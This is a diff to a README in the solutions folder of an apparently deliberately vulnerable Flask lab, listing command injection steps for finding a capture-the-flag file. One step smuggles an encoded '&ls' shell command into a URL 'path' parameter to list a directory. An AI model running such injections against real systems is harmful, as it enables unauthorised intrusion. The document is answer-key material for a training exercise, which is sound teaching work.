TheCodeSummoner/SecurityPi/solutions/vulnerable_flask/README.md

 Correct query is present in the *correct_query* file.

-Example command injection steps to get the location of the flag:
+Example command injection steps to get the flag:

 1. `IP:PORT/?path=` - Gets the current directory location
 2. `IP:PORT/?path=%26ls%20/home/pi/Desktop/SecurityPi/vulnerable_flask/` - Lists what is inside the current directory